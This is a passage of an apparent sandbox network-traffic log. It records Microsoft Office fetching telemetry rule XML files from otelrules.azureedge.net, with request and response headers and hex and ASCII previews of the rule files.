                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                ETag: "0x8DC582BB5B890DB"
                                x-ms-request-id: 205353cd-201e-006e-0bb2-42bbe3000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165148Z-174f7845968jrjrxhC1EWRmmrs00000016ag00000000ex65
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:48 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                Session IDSource IPSource PortDestination IPDestination Port
                                81192.168.2.55005113.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:48 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:48 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:48 GMT
                                Content-Type: text/xml
                                Content-Length: 3342
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                ETag: "0x8DC582B927E47E9"
                                x-ms-request-id: 5899b398-501e-007b-7df3-445ba2000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165148Z-174f7845968xr5c2hC1EWRd0hn0000000r40000000005dnf
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:48 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                Session IDSource IPSource PortDestination IPDestination Port
                                82192.168.2.55005213.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:48 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:48 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:48 GMT
                                Content-Type: text/xml
                                Content-Length: 501
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                ETag: "0x8DC582BACFDAACD"
                                x-ms-request-id: 42ae9f56-701e-0001-1d37-40b110000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165148Z-174f7845968kdththC1EWRzvxn0000000km0000000008ym6
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:48 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                Session IDSource IPSource PortDestination IPDestination Port
                                83192.168.2.55004913.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:48 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:48 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:48 GMT
                                Content-Type: text/xml
                                Content-Length: 1952
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                ETag: "0x8DC582B956B0F3D"
                                x-ms-request-id: fdde7aaa-d01e-0028-2a8c-3f7896000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165148Z-174f7845968kvnqxhC1EWRmf3g0000000sxg00000000radk
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:48 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                Session IDSource IPSource PortDestination IPDestination Port
                                84192.168.2.55004813.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:48 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:48 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:48 GMT
                                Content-Type: text/xml
                                Content-Length: 958
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                ETag: "0x8DC582BA0A31B3B"
                                x-ms-request-id: 87286592-701e-0053-7b27-443a0a000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165148Z-174f7845968kvnqxhC1EWRmf3g0000000t1000000000b3e4
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:48 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                Session IDSource IPSource PortDestination IPDestination Port
                                85192.168.2.55005613.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:50 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:51 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:50 GMT
                                Content-Type: text/xml
                                Content-Length: 1393
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                ETag: "0x8DC582BE39DFC9B"
                                x-ms-request-id: 4793f8bc-701e-0053-5872-433a0a000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165150Z-174f7845968px8v7hC1EWR08ng00000016bg00000000uwgf
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:51 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                Session IDSource IPSource PortDestination IPDestination Port
                                86192.168.2.55005313.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:50 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:51 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:50 GMT
                                Content-Type: text/xml
                                Content-Length: 2284
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                ETag: "0x8DC582BCD58BEEE"
                                x-ms-request-id: a7f5da2f-b01e-0070-7a69-431cc0000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165150Z-174f784596886s2bhC1EWR743w00000016bg0000000004yn
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:51 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                Session IDSource IPSource PortDestination IPDestination Port
                                87192.168.2.55005413.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:50 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:51 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:50 GMT
                                Content-Type: text/xml
                                Content-Length: 1393
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                ETag: "0x8DC582BE3E55B6E"
                                x-ms-request-id: 68f80354-c01e-002b-0bf2-446e00000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165150Z-174f7845968glpgnhC1EWR7uec00000016b000000000hw3d
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:51 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                Session IDSource IPSource PortDestination IPDestination Port
                                88192.168.2.55005713.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:50 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:51 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:50 GMT
                                Content-Type: text/xml
                                Content-Length: 1356
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                ETag: "0x8DC582BDF66E42D"
                                x-ms-request-id: 743f446d-301e-005d-68fb-44e448000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165150Z-174f784596886s2bhC1EWR743w000000164g00000000tmbp
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:51 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                Session IDSource IPSource PortDestination IPDestination Port
                                89192.168.2.55005513.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:50 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:51 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:50 GMT
                                Content-Type: text/xml
                                Content-Length: 1356
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                ETag: "0x8DC582BDC681E17"
                                x-ms-request-id: 7e2a4532-c01e-0049-6b07-41ac27000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165150Z-174f7845968pght8hC1EWRyvxg00000009ag00000000ggfc
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:51 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                Session IDSource IPSource PortDestination IPDestination Port
                                90192.168.2.55006213.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:53 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:53 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:53 GMT
                                Content-Type: text/xml
                                Content-Length: 1389
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                ETag: "0x8DC582BE10A6BC1"
                                x-ms-request-id: c36c9036-001e-0014-67fa-445151000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165153Z-174f7845968cs2nkhC1EWR2tq000000001zg000000001rmq
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:53 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                Session IDSource IPSource PortDestination IPDestination Port
                                91192.168.2.55005913.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:53 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:53 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:53 GMT
                                Content-Type: text/xml
                                Content-Length: 1358
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                ETag: "0x8DC582BE6431446"
                                x-ms-request-id: ebed6b5e-401e-0015-4f72-400e8d000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165153Z-174f7845968glpgnhC1EWR7uec00000016e000000000481b
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
